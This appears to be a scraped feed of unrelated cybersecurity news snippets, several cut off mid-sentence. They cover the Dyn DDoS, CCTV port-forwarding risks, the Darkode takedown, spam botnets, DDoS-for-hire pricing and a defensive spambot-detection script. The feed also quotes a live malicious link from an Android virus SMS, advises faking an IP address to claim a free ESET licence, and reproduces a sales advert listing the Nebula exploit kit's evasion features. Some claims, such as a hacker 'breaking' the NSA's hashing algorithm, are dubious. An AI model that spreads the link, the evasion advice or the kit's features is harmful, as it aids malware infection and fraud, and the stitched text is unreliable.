Cloud approaches to security offer a solution. Software-as-a-service security companies like Zscaler can scan our mobile data traffic using proxies and VPNs, scrubbing them for malware, phishing, data leaks, and bots. In addition we see startups like Blue Cava, Iovation, and mSignia using Big Data to prevent fraud by fingerprinting mobile devices.

Cloud security also involves protecting cloud infrastructure itself. New technologies are needed to secure the client data inside cloud-based services against theft or manipulation during transit or storage. Some security auditors and security companies already sell into this market, but most cloud developers, focused on strong customer growth, have been slow to deploy strong security. Eventually it should become possible for cloud computing customers to encrypt and destroy data using their own encryption keys. Until they do, there is an opportunity for startups such as CipherCloud and Vaultive to sell encryption technology that is used by companies over the top of their cloud services to encrypt the data inside.

Lastly, cloud security also includes protecting against the cloud, which enables creative new classes of attack. For example, Amazon Web Services can be used for brute force attacks on cryptographic protocols, like the one a German hacker used in 2010 to break the NSA’s Secure Hashing Algorithm. Attackers can use botnets and virtual servers to wage distributed denial of service attacks, and bots can bypass captcha defenses by crowdsourcing the answers. Cloud-based attacks demand innovative defenses that will likely come from startups. For example, Prolexic and Defense.net (a company Bessemer has invested in) operate networks of filters that buffer their clients from cloud-based DDOS attacks.

Cloud computing may open up enormous vulnerabilities on the Internet, but it also presents great opportunity for innovative cybersecurity. In the coming decade, few areas of computing will be as attractive to entrepreneurs, technologists, and investors.
          Mirai-based DDoS attack highlights benefits of Apple's secure HomeKit platform        
By Mikey Campbell, Friday, October 21, 2016, 10:25 pm PT (01:25 am ET)

A distributed denial of service (DDoS) attack that on Friday severely impacted internet access for many U.S. web denizens was found to be in part enabled by a botnet targeting unprotected "Internet of Things" devices. For Apple, the revelation vindicates a controversial walled garden approach to IoT borne out through the HomeKit protocol.

As detailed yesterday, unknown hackers set their sights on Dyn, an internet management company that provides DNS services to many major web entities. A series of repeated attacks caused websites including The Verge, Imgur and Reddit, as well as services like HBO Now and PayPal, to see slowdowns and extended downtimes. Follow-up waves played havoc with The New York Times, CNN, Netflix, Twitter and the PlayStation Network, among many others. Though Dyn was initially unable to
          Internet & Network Softwares : Symantec Norton 360 v3.0 All-in-One PC Internet & Network Softwares $39.99        

Protects against viruses, worms, hackers, and botnets; safeguards against online identity theft; protects important files; keeps your PC tuned and running at peak performance.

          The 5 cyber security statistics you need to know in 2017        
‘Cybercrime is the greatest threat to every company in the world’ says IBM’s CEO, Ginni Rometty. If you’re already working on boosting your security – or haven’t started yet – now’s the time. Here are five reasons why…


1. Cybercrime cost to hit £2.41 trillion a year - Juniper Research


Cybercrime is expensive. Get hit and you’ll feel it in your profits. For example, a successful DDoS attack will force your systems offline and can cost you upwards of £100,000 every hour. 2016 saw a reported 22% increase in cybercrime, and it certainly didn’t go unnoticed in the media. Big names like Yahoo, TalkTalk, Tesco, Netflix, Sony and even the presidential election fell victim to cyber-attacks.

Get EC-Council’s Certified Ethical Hacker certification to help defend against attacks.


2. Cyber security spending to exceed £815 billion by 2021 - CSO Online


Businesses continue to realise the need to spend more on cyber security products, like software and training. In 2016, over £6.5bn was spent worldwide on information security (Gartner).

Despite this growing demand for training, a 2016 government report highlights that there’s still much to be done for businesses. With just under a fifth of businesses ensuring their staff take part in cyber security training in 2016, staff and the general public are still too unaware of their responsibilities in this regard.  

3. Unfilled cyber security jobs to reach 1.5 million by 2020 - (ISC)² 


There’s a severe shortage of qualified cyber security professionals. What’s more, the average salary for a CISSP certified professional is now £62,500.

The effect of this shortage means businesses are struggling to implement the security measures needed. A recent study by Cybersecurity Ventures of over 1,000 IT Professionals globally found that IT security managers reported significant obstacles in implementing desired security projects due to lack of expertise (34.5%) and inadequate staffing (26.4%).


4. Four billion people online by 2020 (Microsoft)


Double the current number of people will be online by 2020. As 91% of attacks begin with email phishing (Mimecast), the potential exploitation for hackers here is massive. Avoid social engineering attacks by educating your employees on information security.

More worrying statistics concerning the growing number of employees online and with access to sensitive data came from AXELOS. They found that 75% of large organisations and nearly a third of small organisations suffered staff-related security breaches in 2015, and 50% of the worst breaches of the same year were caused by human error.

A simple and cost-effective way to test your employees’ cyber security knowledge is through EC-Council’s Certified Secure Computer User (CSCU) test. This will help benchmark the cyber security awareness and competence of your workforce.


5. 200 billion IoT devices will need securing by 2020 (Intel)


More internet connected devices – from thermostats to fridges - in the hands of the public means more opportunities for hackers to infiltrate home networks.

Take a look at the recent hack of the DNS provider Dyn, which brought down major organisations, as a result of an army of 100,000 IoT devices being hacked. Dyn Vice President Scott Hilton stated that the compromised devices had been hit with the notorious Mirai malware that scans for IoT devices that are still using their default passwords. It then enslaves those devices to a botnet army, which was used to force Dyn offline.

As technology develops and individuals and businesses increasingly adopt these novel technologies, the phrase, “with great power, comes great responsibility” has never rung truer. 

Are you prepared for the next cyber-attack?  

          Two-Factor Authentication: What it is and Why You Should be Using it Now        

Not too long ago, WordPress sites around the world started getting attacked with automated botnet traffic trying to brute force admin passwords. The other day, the official Twitter account of the Associated Press was hacked. Last year, Wired reporter Mat Honan was hacked when his Amazon account was compromised. That compromise allowed an attacker to …

The post Two-Factor Authentication: What it is and Why You Should be Using it Now appeared first on Technosailor.com.


          CCTV exposed. Why understanding network security is so important.        

For those of you who are regulars on Geekzone you’ll know one of my pet peeves is people who don’t understand the huge security risk associated with port forwards. Configuring a port forward in your router or firewall is something configured by people every day, with the vast majority probably failing to consider the security risks of something that’s so easily done.

Opening up your network to allow traffic from anywhere on the Internet to directly access your PC or hardware behind your router and/or firewall removes an entire layer of security, and allows anybody on the Internet to directly access your PC or hardware on the port(s) that have been forwarded. If there are security exploits in either the software on your PC or the hardware it could easily compromise your entire network and your security.

If you’re running a VoIP setup and port forward port 5060 you’re opening your IP PBX or phone system up to what will be a never-ending attack from bots and scripts trying to find holes in your system for the purpose of routing illegitimate calls. By setting up a port forward to CCTV equipment you run the risk of your security cameras being left wide open for anybody on the Internet to view, both for entertainment and for possible malicious purposes.

In recent days we’ve once again seen a mainstream media article on Stuff discussing compromised or poorly configured CCTV cameras in New Zealand that can be openly viewed by anybody on the Internet. While Stuff have chosen not to name where these cameras are linked from, the source is insecam.org, a site that proclaims itself “the world biggest directory of online surveillance security cameras”. This story is very similar to another run in 2014 in the NZ Herald discussing the very same issue with cameras in New Zealand viewable on the insecam website.


While this site only lists openly viewable CCTV equipment, the IoT search tool Shodan is the best resource on the Internet for discovering hardware devices (both CCTV and other) that are exposed to the Internet. Many of these devices are “compromised” because of one simple flaw – either configuring port forwards to allow remote access, or enabling UPnP and allowing the devices to create their own port forwards for remote access. It’s worth pointing out here that the insecam website isn’t doing anything illegal – they’re simply aggregating content that’s all publicly accessible.

If you’ve got CCTV cameras then it’s not an unrealistic requirement to want to view these remotely. Most systems these days offer web access and/or mobile apps allowing you to view your cameras from anywhere in the world, and many even pitch remote access as a key selling point. The simplest way to configure remote access is to set up a port forward allowing direct access to the camera itself, a Network Video Recorder (NVR) or a Digital Video recorder (DVR).

Some equipment may also be UPnP enabled to make this process even easier – if you have a router with UPnP capabilities and the UPnP functionality is enabled on both your router and the CCTV equipment, you may have your CCTV equipment exposed to the Internet without even knowing it. By having a port forward or UPnP enabled you’ve exposed your CCTV system to the entire Internet, and it’s now only as secure as the hardware you’re using. And that’s where the problems start.

Many people clearly never change default passwords of some of the equipment viewable on the Internet. Many brands of cheap Chinese CCTV equipment also run embedded software of dubious quality with very well known exploits and hacks. Many also contain backdoor passwords, meaning that even if you change the password these devices can still be accessed by anybody with this knowledge. As many of these systems are never upgraded by installers or end users, flaws that have been fixed can often still exist for the life of the system.

The issues also extend beyond somebody snooping on your video feeds – some of these exploits can also be used to turn your hardware into a bot capable of being used for major DDoS attacks, or even turned into a tool for mining bitcoins. In September 2016 one of the world’s largest DDoS attacks, against krebsonsecurity, was reportedly performed with the assistance of over 145,000 compromised CCTV cameras.

In my day job as a network engineer I’ve had numerous dealings with security companies who lack even basic fundamental knowledge when it comes to networking and security. Concepts of networking are something that many people will fail to grasp, with many people relying on the advice of others or a “she’ll be right” mentality rather than seeking proper advice from an expert.

There have been many threads here on Geekzone about CCTV systems and comments posted by people who have been told that “nobody knows your IP address”, “you’re on a dynamic IP address which keeps changing so nobody will find you”, “I’ll change the port to something random so they won’t find you” or “if you make your password secure you’ll be fine”. Statements like this show a fundamental lack of knowledge, and when they’re given by people posing as security experts, should really be raising alarm bells. Having a public IP that changes regularly or changing ports offers absolutely nothing in the way of security. Likewise, having a secure password is meaningless if a backdoor master password exists on your device.

If you’re wanting remote access to most hardware on an internal network there is only one safe way to do this – by using a Virtual Private Network (VPN). By using an appropriate router with a built in VPN server you can connect your remote PC or phone via VPN and then safely browse your cameras with no risk of your cameras or data being exposed to the entire Internet. If access is only required from specific connections then you could also look to restrict access to a locked down range of public IP addresses to ensure your cameras are not unnecessarily exposed.

If you have an IP camera, NVR or DVR that’s exposed to the Internet using port forwards or you have UPnP enabled you should be taking immediate steps to secure it. If your knowledge of networking doesn’t extend to configuring a VPN then you should be disabling remote access and/or UPnP until such time as you are able to implement a VPN or lock down access to specific IP ranges.

If your security or CCTV installer has no issues with allowing port forwards then you should be on the lookout for a new installer. You’re not just compromising your own safety and security, you’re also compromising the safety, security and end user experience of everybody on the Internet if your hardware can be compromised and used as a bot for DDoS attacks.


          BBC: Darkode hacking forum forced offline        
By Leo Kelion, Technology desk editor, BBC

15 July 2015
From the section: Technology
The Darkode forum, which was created about six years ago, can no longer be accessed
Darkode - a notorious hacking forum used by Lizard Squad and other cybercriminals - has been shut down after an investigation carried out by authorities in 20 countries.
"We have dismantled a cyber-hornets' nest... which was believed by many, including the hackers themselves, to be impenetrable," said one of the US state attorneys involved.

Twenty-eight people have been arrested.

They include a 26-year-old man from Coventry, England.

In addition, the UK's National Crime Agency said an address in Paisley, Scotland, had been searched and material removed for examination. It said that five other suspected members of the site had previously been arrested.

The FBI added that dozens of other people linked to the site had been charged or had their property searched as part of the inquiry.
Restricted access
Darkode's members allegedly used the site to trade and to share hacking tools and information, including details of zero-day attacks - techniques that exploited flaws in products that neither their creators nor the wider security industry were aware of, and thus could not be protected against.

This information was password-protected.

"Only those proposed for membership by an existing user could join, but not until they posted a resume of the skills and achievements that could contribute to the criminal community," explained the NCA.

"There was a hierarchical membership structure, and the status of users determined who they could communicate with, and their access to the commodities and services on offer."

Although the site was not accessible to the general public, it was profiled extensively by the security blogger Brian Krebs, who posted several screenshots on his site.

Botnets - networks of hijacked computers used to mount co-ordinated attacks - were promoted on the site
"Most of the cybercrime forums are in Russian or some other language that's not English, but this was an English-language forum," he told the BBC.

"And it was a sort of meeting ground for cybercriminals from different nationalities and languages.

"A fairly significant number of people were selling botnet services there, and there were also services for deploying malware and phishing."

He added that the forum's visitors included members of Lizard Squad - a group of hackers which has carried out high-profile attacks on Sony, Microsoft and others.

"The guy that was most recently the admin of the forum used the nickname Sp3c," Mr Krebs recalled.

"He was a leading member of the Lizard Squad. What's interesting is that you don't see his name in the lists of those that were apprehended or charged as part of this.

"I don't really know what that means, but there was a definite connection between the Lizard Squad and this forum, at least in the last year or so."

The FBI said that Operation Shrouded Horizon had indicated up to 300 people had used the forum.

"During the investigation, the bureau focused primarily on the Darkode members responsible for developing, distributing, facilitating and supporting the most egregious and complex cybercriminal schemes targeting victims and financial systems," it said.

It added that its counterparts in Australia, Bosnia, Brazil, Israel, Colombia and Nigeria were among those involved in the international crackdown, and that efforts to trace other suspects were "ongoing".

          Black Hat 2014: How to Hack the Cloud to Mine Crypto Currency        
Cyber security researchers devise a hack to demonstrate the need for improved anti-botnet security measures
          Comment on Dutch Police infect users with trojan – legal or illegal; good thing or bad thing? by Crimefighters take down Beebone botnet - ITsecurity        
[…] But the crimefighters are learning. When the Dutch police ‘took down’ the Bredo botnet in 2010, they ‘infected’ every bot communicating with the servers with their own warning malware. Strictly speaking they almost certainly broke European laws. (See Dutch Police infect users with trojan – legal or illegal; good thing or bad thing?). […]
          NerdTech 15 - Viruses        
In this podcast: We talk about the most famous viruses and bust a few myths such as "there are no viruses for Mac".
SHOWCASE ART: André Carvalho
THIS NERDCAST IS BROUGHT TO YOU BY ALURA. Every FIRST Friday of the month you get an extra Nerdcast about technology. Visit: http://www.alura.com.br/promocao/nerd
Links mentioned in the show: https://www.alura.com.br/podcast-nerdtech/links
Nerdologia Tech 04 - Botnets: a zombie army ready to attack: https://goo.gl/HeuFcr
NerdTech full playlist: https://goo.gl/18WWFs
E-MAILS: Send your criticism, praise, suggestions and jabs to nerdcast@jovemnerd.com.br
FULL EDITING BY RADIOFOBIA PODCAST E MULTIMÍDIA http://radiofobia.com.br
          „Tele2“ warns about spreading virus SMS messages        
Telecommunications company „Tele2“ warns about spreading messages containing a link to a malicious program.

The messages are sent to smartphones running the „Android“ operating system. The message contains the text „Privet tut fotki http://bit.ly/YJrDjG kak tebe?“ with a link. Clicking the link takes the user to a website from which a malicious program is downloaded. The program then sends identical messages to everyone in the phone's address book.

„Users should be vigilant: it is important not to click the links provided, not to reply and not to take any other action before making sure it is safe,“ said Mindaugas Kežionis, Product Manager at „Tele2“.

What should you do if you receive such a message? Most importantly, do not click the link in it, and if you have clicked it, do not agree to install the downloaded program. Installing the program creates the risk that cyber fraudsters will add the phone to an „infected“ network (a botnet). The phone will then automatically send an identical message to everyone in its address book. Cyber fraudsters can also keep using a phone that is part of a botnet later, sending messages to the contacts stored on it.

To protect against similar virus SMS messages, „Tele2“ suggests choosing dedicated antivirus programs for mobile phones. Most such programs are available free of charge in the „Google Play“ app store.

More information
Andrius Baranauskas, „Tele2“ Director of Corporate Communications for the Baltic countries
mob. +370 683 66319, el. paštas: 
andrius.baranauskas@tele2.com
          Ten Most wanted Spam Botnets        
Spam continues to flood most of our inboxes despite the numerous filters used to check it. One of the big reasons for this is the growth of malicious botnets.

Botnets are networks of compromised machines, driven from command-and-control servers, that cyber criminals use to pump spam into our mailboxes. M86 Security recently released its 'Top Ten Most Wanted' list of spam-spewing botnets.

Rustock(43%) : Rustock's malware employs a kernel-mode rootkit, inserts random text into spam and is capable of TLS encryption. Concentrates solely on pharmaceutical spam.

Mega-D(10.2%) : This long-running botnet has had its ups and downs, owing to the attention it attracts from researchers. Concentrates mostly on pharmaceutical spam.

Festi(8%) : This spambot employs a kernel mode rootkit and is often installed alongside Pushdo on the same host.

Pushdo(6.3%) : This is a multi-faceted botnet with many different types of campaigns. A major distributor of malware downloaders and blended threat e-mails, but also sends pharma, replica, diploma and other types of spam.

Grum(6.3%) : This too uses a kernel-level rootkit. Grum employs a range of spamming templates that change often, served up by multiple Web servers. Mostly pharma spam.

Lethic(4.5%) : The malware acts as a proxy by relaying SMTP from a remote server to its destination. This too is largely pharma and replica spam.

Bobax(4.3%) : Another old timer, this botnet employs sophisticated methods to locate its command servers.

Bagle(3.5%) : Bagle gets its name from an earlier mass-mailing worm. These Bagle variants act as proxies for data, and especially for spam.

Maazben(2.0%) : Maazben uses a proxy-based spam engine. In certain cases it may also use a template-based spam engine if the bot runs behind a network router. The botnet specialises in casino spam.

Donbot(1.3%) : Donbot is named after the string "don" found in the malware body. This too is largely pharma spam. "Other" spambots account for 10.7% of all spam.
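One network-side way to spot the behaviour described in the list above (a bot that relays SMTP straight out to the Internet, as Lethic and the Bagle variants do), as an added example that is not part of the M86 Security report: the log format, the addresses and the known-relay list are constructed for the example.

```python
"""Flag hosts that behave like spam bots: a workstation opening direct outbound SMTP
(TCP/25) connections to many distinct mail servers.

Added example for this page, not M86 Security's tooling; the log format, the
addresses and the relay list are constructed for the example."""
import re
from collections import defaultdict

# Constructed connection-log lines in a generic key=value layout (no real product's format).
# 10.0.0.12 behaves like a spambot, 10.0.0.25 is the site's legitimate mail relay,
# 10.0.0.40 submits mail to the relay on 587 and browses, 10.0.0.41 opens a single
# SMTP connection, which is not enough to alert on.
SAMPLE_LOG = """\
2011-03-01T10:00:01 ACCEPT src=10.0.0.12 dst=203.0.113.5 proto=tcp dpt=25
2011-03-01T10:00:02 ACCEPT src=10.0.0.12 dst=198.51.100.7 proto=tcp dpt=25
2011-03-01T10:00:02 ACCEPT src=10.0.0.12 dst=198.51.100.9 proto=tcp dpt=25
2011-03-01T10:00:03 ACCEPT src=10.0.0.12 dst=203.0.113.44 proto=tcp dpt=25
2011-03-01T10:00:03 ACCEPT src=10.0.0.12 dst=192.0.2.77 proto=tcp dpt=25
2011-03-01T10:00:04 ACCEPT src=10.0.0.12 dst=192.0.2.78 proto=tcp dpt=25
2011-03-01T10:00:04 ACCEPT src=10.0.0.12 dst=192.0.2.78 proto=tcp dpt=25
2011-03-01T10:00:05 ACCEPT src=10.0.0.25 dst=203.0.113.5 proto=tcp dpt=25
2011-03-01T10:00:05 ACCEPT src=10.0.0.25 dst=198.51.100.7 proto=tcp dpt=25
2011-03-01T10:00:06 ACCEPT src=10.0.0.25 dst=192.0.2.77 proto=tcp dpt=25
2011-03-01T10:00:06 ACCEPT src=10.0.0.25 dst=192.0.2.78 proto=tcp dpt=25
2011-03-01T10:00:07 ACCEPT src=10.0.0.25 dst=203.0.113.44 proto=tcp dpt=25
2011-03-01T10:00:08 ACCEPT src=10.0.0.40 dst=10.0.0.25 proto=tcp dpt=587
2011-03-01T10:00:09 ACCEPT src=10.0.0.40 dst=203.0.113.80 proto=tcp dpt=443
2011-03-01T10:00:10 ACCEPT src=10.0.0.41 dst=203.0.113.5 proto=tcp dpt=25
"""

LINE_RE = re.compile(
    r"src=(?P<src>\d{1,3}(?:\.\d{1,3}){3}) dst=(?P<dst>\d{1,3}(?:\.\d{1,3}){3}) "
    r"proto=tcp dpt=(?P<dpt>\d+)"
)

# Hosts that are allowed to talk SMTP to the outside world (assumed: the site's relay).
KNOWN_RELAYS = {"10.0.0.25"}


def outbound_smtp_fanout(log_text):
    """Map each source host to the set of distinct hosts it reached on TCP/25."""
    fanout = defaultdict(set)
    for line in log_text.splitlines():
        match = LINE_RE.search(line)
        if match and match.group("dpt") == "25":
            fanout[match.group("src")].add(match.group("dst"))
    return dict(fanout)


def suspected_spambots(log_text, min_destinations=5, known_relays=KNOWN_RELAYS):
    """Sources, other than known relays, that reached at least min_destinations distinct
    SMTP servers. Counting distinct destinations rather than connections is what
    separates a bot spraying MX hosts from a client retrying its own mail server."""
    return sorted(
        src
        for src, destinations in outbound_smtp_fanout(log_text).items()
        if src not in known_relays and len(destinations) >= min_destinations
    )


if __name__ == "__main__":
    for host in suspected_spambots(SAMPLE_LOG):
        count = len(outbound_smtp_fanout(SAMPLE_LOG)[host])
        print(f"{host}: {count} distinct SMTP destinations")
```

The same observation is usually enforced rather than merely detected: if the perimeter only permits TCP/25 from the mail relay, a proxy-style bot on a workstation cannot deliver at all, whatever templates its operator rotates.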




          Comment on Why Gridcoin Beats Golem Hands Down by Nathan        
BOINC is a platform (a set of tools) for creating a distributed computing project in a standardized way. Anybody (including businesses) can create a BOINC project and submit it for inclusion on the Gridcoin whitelist. The whitelist is primarily in place to deal with hacked / abusive projects which have no work units, give away credits, run malware, or otherwise behave in some way that essentially steals a share of the GRC rewards. That said, ultimately the whitelist is not a hard requirement and there are various ways it could be removed, though I'm not certain that would be a good thing. Note that Golem expects every user to maintain his or her own whitelist, so the only difference here is the community vs. individual aspect. There are arguably some advantages to the Gridcoin approach, especially since not every user will have the time or sophistication to deal with tasks that run malicious code such as botnets or tasks that attempt to jailbreak and attack the host systems.
          Hackers sell their services by the hour on the black market        

The level of service offered illegally for a digital attack (of the DDoS type) organised on the black market is not far from that of a legitimate business. The basic difference is that there is no direct contact between supplier and customer, note the analysts at Kaspersky Lab.

Organising a digital attack costs 7 dollars an hour, while the targeted company may suffer damages of thousands, if not millions. Groups of cybercriminals operating with a corporate structure are the providers of such services, following the familiar sales and support models. For example, they offer a user-friendly website where customers, after registering, can choose the service they need, pay for it and receive a report on the results of the attacks. In some cases there is even a loyalty programme, with customers receiving rewards and bonus points for each attack.

It is also interesting that some cybercriminals have no qualms about selling DDoS attacks and, at the same time, protection against them.

Various factors affect the cost to the customer. One is the type of attack and its origin. A botnet made up of IoT devices is cheaper than a comparable botnet of servers. However, not all suppliers are ready to provide such information. Another factor is the duration of the attack (measured in seconds, hours and days) and the location of the customer. DDoS attacks on English-language websites, for example, are usually more expensive than similar attacks on Russian-language websites.
Another major area affecting cost is the type of victim. Attacks on government websites and resources are much more expensive, because they are protected by anti-DDoS systems and there is a high risk of detection. For example, on one DDoS-as-a-service website the cost of an attack on a range of unprotected websites ranges from 50 to 100 dollars, while an attack on a protected website costs more than 400 dollars.

This means that a DDoS attack can cost anywhere from 5 dollars for a 300-second attack to 400 dollars for a 24-hour attack. The average cost of an attack is about 25 dollars an hour. Kaspersky Lab's experts estimate that an attack using a cloud-based botnet of 1,000 computers costs the service providers 7 dollars an hour, which means the cybercriminals organising DDoS attacks make a profit of roughly 18 dollars an hour.

There is, however, another scenario that is even more profitable for cybercriminals: the attackers demand a ransom from a target in exchange for not launching a DDoS attack, or for stopping one already in progress. The ransom may be the bitcoin equivalent of thousands of dollars, meaning that the profitability of a single attack can exceed 95%. In fact, those carrying out the extortion do not even need the resources to launch an attack; sometimes the threat is enough.

          New VPN Ban in Russia Latest Step in Increasing Cyber Risk for US Companies        

Location: United States
Date published: August 3, 2017

"Moreover, Scott Shackelford, cybersecurity program chair at Indiana University, said the case in part 'illustrates the difficulty of shutting down botnets (given how easy it is to set up new command and control servers), along with the trouble of protecting trademarks online. At a higher level, it helps highlight the difficulty of exercising jurisdiction in an interconnected world.'"


          Information Security - Aja dwc , Dubai         
Information Security (3 semester hours) is a comprehensive study of the principles and practices of computer system security, including operating system security, network security, software security and web security. Topics include common attack techniques such as viruses, trojans, worms and memory exploits.
Introduction
  • Course introduction (syllabus, policies, projects, and recent cyber threats overview)
  • An overview of information security: confidentiality, integrity, and availability
Understanding the Threats
  • Malicious software (Viruses, trojans, rootkits, worms, botnets)
  • Memory exploits (buffer overflow, heap overflow, integer overflow, format string)
Formalisms
  • Access control theory, access control matrix
  • Information flow
Policy
  • Security policies
  • Confidentiality policies (BLP model)
  • Integrity policies (Biba, and Clark-Wilson model)
  • Hybrid policies (Chinese Wall model, role-based access control)

Cost:

Certified


          MALfi attacks used to deploy disposable, single-use botnets: a clear trend in cybercrime        
SecuObs.com : 16/11/2009 - secuobs : MALfi attacks used to deploy disposable, single-use botnets: a clear trend in cybercrime
          Hacker Sentenced to 46 Months in Prison for Spreading Linux Malware        
A Russian man accused of infecting tens of thousands of computer servers worldwide to generate millions in fraudulent payments has been sentenced to 46 months (nearly four years) in a United States federal prison. 41-year-old Maxim Senakh, of Velikii Novgorod, was arrested by Finnish police in August 2015 for his role in the development and maintenance of the infamous Linux botnet called

          2 million passwords stolen        
Two million passwords for Facebook, Twitter, Yahoo and ADP stolen and found on a Pony botnet server
          Season 1 Episode 17        
In this episode: The first Linux botnet has been detected, version 2.6.31 of the Linux kernel has been released and the Haiku project announces the availability of Alpha 1 of its BeOS-like operating system. We discuss Novell's expensive foray into iPhone development with its MonoTouch SDK and we ask whether we should focus on other Unixes alongside Linux.
          Six months of ESET Premium Security licence for free        

 Useful features of ESET Security

Computer Protection: Lets you turn on real-time protection. One very nice thing about ESET Security is its Gamer Mode, a feature few products have, which optimises performance during online gaming and presentations. When it is enabled, the software assesses the system and works out the best performance for the user.

Internet Protection: Lets you configure the internet security features, covering web, email, anti-spam and anti-phishing. Unlike other products that mainly integrate with the browser, ESET Security lets you plug this protection into any email client, so unwanted threats are filtered out there as well.

Network Protection: Lets you configure network security such as the personal firewall and protection against targeted network attacks. With an emphasis on user and system security, ESET Smart Security also comes with anti-botnet protection, such as blocking IPs and connecting computers, to give the user a safe connection. This is another quite useful feature integrated into ESET Smart Security.

Improving social networking and online payments

To use the banking and e-payment protection, select the Security Tools menu and configure it there. This section has three rather unique options that not every security product integrates: protection for payments on banking and e-payment websites.

Besides that, blocking of malicious websites has been strengthened, alongside a rather unique anti-theft feature that protects your data and helps locate a lost device.

Eset smart security - Anti-theft

Analysing threats coming from social networks, as well as disguised malicious links, is another useful feature ESET Smart Security offers. With this tool, the user gets a summary of links that may be harmful.

Eset smart security - social network antivirus

In addition, this feature helps protect the user's information by connecting directly to the application, strengthening the security of the user's social network account.

Advanced settings

Many security vendors provide advanced settings for professional users who want to get more out of the program. To adjust them, choose Advanced Setup at the bottom right of the application to open the main interface.

Eset smart security - advanced settings

Notable in this section are the Web and Email parts, which protect the user against most threats on the internet, such as dangerous applications and harmful websites, and also hold the e-payment and banking protection settings.


Registration link: https://www.eset.com/au/geteset/ (you need to fake your IP to Australia).
Fill in the form as shown in the picture, including the Flyer Licence Key code (in the picture).
Then click Get your license. And wait!
In my tests it sometimes worked and sometimes did not, possibly because many people are registering, so take your time.



          ‘Operation Tovar’ Targets ‘Gameover’ ZeuS Botnet, CryptoLocker Scourge        
The U.S. Justice Department is expected to announce today an international law enforcement operation to seize control over the Gameover ZeuS botnet, a sprawling network of hacked Microsoft Windows computers that currently infects an estimated 500,000 to 1 million compromised systems globally. Experts say PCs infected with Gameover are being harvested for sensitive financial and personal data, and rented out to an elite cadre of hackers for use in online extortion attacks, spam and other illicit moneymaking schemes.
          Researchers Clobber Khelios Spam Botnet        
Experts from across the security industry collaborated this week to quarantine more than 110,000 Microsoft Windows PCs that were infected with the Khelios worm, a contagion that forces infected PCs to blast out junk email advertising rogue Internet pharmacies. Most botnets are relatively fragile: If security experts or law enforcement agencies seize the Internet servers used to control the zombie network, the crime machine eventually implodes. But Khelios (a.k.a. "Kelihos") was built to withstand such attacks, employing a peer-to-peer structure not unlike that used by popular music and file-sharing sites to avoid takedown by the music and entertainment industry.
2012-09-14 04:41:37 - irongeek_adc : RT @isdpodcast: Podcast: Episode 759 - Nitol Botnet,Google 163 iTunes Holes, Pressing 'On', 'Great Escape' http://tco/s1FKcZGW
2012-09-14 03:38:07 - oncee : RT @isdpodcast: Podcast: Episode 759 - Nitol Botnet,Google 163 iTunes Holes, Pressing 'On', 'Great Escape' http://tco/s1FKcZGW
2012-07-21 01:20:18 - ryanaraine : RT @DennisF New podcast with @jnazario on botnet takedowns and whether we can ever win Really enjoyed this one https://tco/sURvE4vi
2012-07-20 22:08:01 - DennisF : New podcast with @jnazario on botnet takedowns and whether we can ever win Really enjoyed this one https://tco/P9Mk3j0j
2012-07-17 11:50:44 - RonGula : I had fun on the RiskyBiz podcast speaking about Botnets Nessus virus auditing : http://tco/39FuIoeV
2012-04-12 17:07:21 - nicolasbrulez : RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco
2012-04-11 20:36:22 - craiu : RT @threatpost: In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the Flashback #Mac botnet, http://tco/4n1V
2012-04-11 08:28:27 - threatpost : In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the Flashback #Mac botnet, http://tco/4n1VeIle
2012-04-11 06:26:05 - ericfreyss : RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco
2012-04-11 00:37:43 - ryanaraine : RT @threatpost In this podcast, @DennisF talks with @ryanaraine and @craiu about the Flashback #Mac botnet http://tco/IFGYIDru
2012-04-11 00:37:43 - ryanaraine : RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco
2012-04-10 22:53:46 - DennisF : RT @threatpost: In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the #Flashback botnet, http://tco/5pwJbfIh
2012-03-15 21:27:28 - Fortinet : March Security Minute video podcast talks Kelihos botnet, CanSecWest hacker payouts, Ke$ha hack and Tax Day scams http://tco/AFS6euiL
2011-11-16 16:04:52 - SearchSecurity : In case you missed it: Deep-dive podcast with Paul Ferguson of @trendmicro on the DNS Changer botnet takedown http://tco/jXGt6foU
2011-10-01 02:48:41 - Fortinet : Fortinet Security Minute video podcast discusses latest threats by “Anonymous,” Waledac botnet and new Android malware http://tco/BmUeQzP7
2011-09-30 04:14:39 - ryanaraine : podcast: @DennisF talks with Tillmann Werner about the takedown of the Kelihos botnet and ethical/legal peculiarities http://tco/JT0g0PaI
          Tsar Putin protects Zeus        


Pagan gods put faith in Russian Orthodox 

It seems that Russian Tsar Putin swings both ways: on the one hand he is a rabid gay-hating Russian Orthodox, on the other he is protecting a bloke who made Zeus a household name.

Researchers have linked one of the world's most-used banking malware attack tools to an espionage campaign that may be tied to the Russian government.

Gameover Zeus is a financially focused malware designed to steal valuable information from machines, such as bank account numbers, passwords, personal identification numbers, and online banking account login details.

It was one of the most successful botnet attack tools used by cyber criminals and is believed to have enslaved between 500,000 and a million computers at its peak.

However, it became clear that GOZ also had a spying function, and specific botnets were being used for espionage that seemed to fit the goals of Tsar Putin.

"After the recent political changes in Ukraine, which led to a more pro-western government, one botnet which had been previously used for banking fraud switched to search for certain types of politically sensitive information," read the paper.

The FBI believes GOZ was created by Evgeniy "Slavik" Bogachev and is currently offering a $4.2 million bounty for information that may lead to his arrest.

However, no one can find him, and the smart money is on him being protected in a manly way by Tsar Putin.

This means that the only chance of anyone other than Tsar Putin getting their paws on him is to snatch him out of the country in a diplomatic bag.


          Bye Empire, Hello Nebula Exploit Kit.        
Nebula Logo




While Empire (RIG-E) disappeared at the end of December after four months of activity, on 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.

Illustration of the last month of witnessed activity for Empire

------
Selling EK Nebula
------
Nebula Exploit kit

Features:
-Automatic domain scanning and generating (99% FUD)
-API rotator domains
-Exploit rate tested in different traffic go up 8/19%
-knock rate tested with popular botnet go 30/70%
-Clean and modern user interface
-Custom domains & server ( add & point your own domains coming soon...)
-Unlimited flows & files
-Scan file & domains
-Multiple payload file types supported (exe , dll , js, vbs)
-Multi. geo flow (split loads by country & file)
-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting
-Public stats by file & flow
